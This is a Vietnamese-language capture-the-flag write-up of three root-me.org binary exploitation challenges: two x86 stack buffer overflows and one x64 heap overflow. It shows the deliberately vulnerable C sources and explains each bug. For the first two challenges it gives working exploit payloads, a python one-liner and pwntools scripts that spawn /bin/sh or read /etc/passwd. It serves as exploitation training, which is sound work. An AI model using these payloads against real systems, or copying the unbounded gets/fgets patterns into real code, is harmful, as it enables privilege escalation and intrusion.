# Try hard www.root-me.org (Writeup) ## - Các mảng try hard - App - Script - App - System - Cracking ## App - Script ## App - System ### ELF x86 - Stack buffer overflow basic 1 ```markdown Start day: 13/03/2025 Level: Easy Description: 5 Points An intermediate level to familiarize yourself with stack overflows ``` | | | | | - | - | - | |PIE | Position Independent Executable | x | |RelRO | Read Only relocations | x | |NX | Non-Executable Stack | x | |Heap exec | Non-Executable Heap | x | |ASLR | Address Space Layout Randomization | x | |SF | Source Fortification | x | |SRC | Source code access | v | **Source code** ```c #include <unistd.h> #include <sys/types.h> #include <stdlib.h> #include <stdio.h> int main() { int var; int check = 0x04030201; char buf[40]; fgets(buf,45,stdin); printf("\n[buf]: %s\n", buf); printf("[check] %p\n", check); if ((check != 0x04030201) && (check != 0xdeadbeef)) printf ("\nYou are on the right way!\n"); if (check == 0xdeadbeef) { printf("Yeah dude! You win!\nOpening your shell...\n"); setreuid(geteuid(), geteuid()); system("/bin/bash"); printf("Shell closed! Bye.\n"); } return 0; } ``` Ở challenge này, lỗi BOF ở dòng code `fgets(buf, 45, stdin);` (biến **buf** được khai báo 40 bytes trong khi chương trình cho phép nhập tới 45 bytes) => Nhiệm vụ bài này: overwrite giá trị biến **check** thành **0xdeadbeef** **POC** ```bash python2 -c "print 'a' * 40 + '\xef\xbe\xad\xde'" | ./ch13 ``` ### ELF x64 - Basic heap overflow ```markdown Start day: 13/03/2025 Level: Easy Description: 10 Points heap heap heap hooray ``` | | | | | - | - | - | |PIE | Position Independent Executable | v | |RelRO | Read Only relocations | v | |NX | Non-Executable Stack | v | |Heap exec | Non-Executable Heap | v | |ASLR | Address Space Layout Randomization | v | |SF | Source Fortification | x | |SSP | Stack-Smashing Protection | x | |SRC | Source code access | v | **Source code** ```c #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> void checkArg(const char *a) { while (*a) { if ( (*a == ';') || (*a == '&') || (*a == '|') || (*a == ',') || (*a == '$') || (*a == '(') || (*a == ')') || (*a == '{') || (*a == '}') || (*a == '`') || (*a == '>') || (*a == '<') ) { puts("Forbidden !!!"); exit(2); } a++; } } int main() { char *arg = malloc(0x20); char *cmd = malloc(0x400); setreuid(geteuid(), geteuid()); strcpy(cmd, "/bin/ls -l "); printf("Enter directory you want to display : "); gets(arg); checkArg(arg); strcat(cmd, arg); system(cmd); return 0; } ``` Bài này là một bài liên quan đến heap overflow. Lỗi xảy ra do đoạn code `gets(arg);` cho phép người dùng nhập vào không giới hạn cho biến **arg** được cấp phát mỗi đúng 0x20 bytes trên heap. => Tận dụng điều này để ghi đè giá trị của **cmd** => Thực thi lệnh để lấy shellcode. **Payload** ```python from pwn import * p = process("/challenge/app-systeme/ch94/ch94") payload = flat( b" " * 0x20, p64(0), p64(0x411), b"/bin/sh" ) p.sendline(payload) p.interactive() ``` Hoặc ```python from pwn import * p = process("/challenge/app-systeme/ch94/ch94") payload = flat( b" " * 0x30, # p64(0), # p64(0x411), b"cat /etc/passwd" ) write("payload", payload) p.sendline(payload) p.interactive() ``` **POC**  ### ELF x86 - Stack buffer overflow basic 2 ```markdown Start day: 14/03/2025 Level: Easy Description: 10 Points An intermediate level to familiarize yourself with stack overflows ``` | | | | | - | - | - | |PIE | Position Independent Executable | x | |RelRO | Read Only relocations | x | |NX | Non-Executable Stack | v | |Heap exec | Non-Executable Heap | v | |ASLR | Address Space Layout Randomization | x | |SF | Source Fortification | x | |SSP | Stack-Smashing Protection | x | |SRC | Source code access | v | **Source code** ```c #include <stdio.h> #include <stdlib.h> #include <sys/types.h> #include <unistd.h> void shell() { setreuid(geteuid(), geteuid()); system("/bin/bash"); } void sup() { printf("Hey dude ! Waaaaazzaaaaaaaa ?!\n"); } void main() { int var; void (*func)()=sup; char buf[128]; fgets(buf,133,stdin); func(); } ``` ## Cracking